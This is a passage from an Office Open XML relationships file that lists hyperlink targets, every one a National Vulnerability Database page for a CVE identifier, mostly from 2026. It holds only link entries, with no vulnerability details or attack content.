Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47523" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47528" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47530" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47535" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47536" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47540" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47541" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47545" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47548" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47550" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47551" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47552" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47553" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47556" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47558" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47559" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47560" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47561" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47563" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47569" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47570" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47571" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47572" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47573" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47574" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47575" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47577" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47578" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47579" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47583" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47585" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47587" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47588" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47589" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47590" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47591" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47592" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47593" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47594" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47595" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47597" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47599" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47600" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47601" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53605" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62146" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100266" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100268" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47576" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100262" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19553" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55177" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62085" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62097" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94082" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96345" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96346" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96827" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96828" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54402" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54403" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58387" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101884" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102091" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102128" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102143" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102717" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103472" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103591" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6806" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75098" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76145" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80276" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85532" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89294" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92121" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92245" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94002" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94120" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94123" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94178" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95587" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95616" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96348" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96818" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96823" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97197" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97240" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97241" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97244" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102123" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103446" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101295" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103229" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103231" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103530" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103536" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47496" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47580" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76143" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102089" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102093" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102094" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102096" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102097" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102098" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102099" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102108" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102114" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102116" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102117" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102119" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102129" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102130" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102131" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102132" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102142" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102150" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102392" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103441" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103442" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79625" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85679" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93624" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93651" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93771" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94122" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94677" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96343" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96344" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96561" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96815" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96832" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96833" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97245" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97256" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97347" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100507" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100510" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102109" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102376" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102385" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102391" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102395" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102396" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102398" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102456" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102457" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103242" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27371" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47554" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47602" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78210" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92869" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93512" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93514" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93770" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94078" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94081" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94171" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94499" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96351" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96352" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96814" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96816" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96819" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96820" TargetMode="External" Id="rId329" /><Relationship 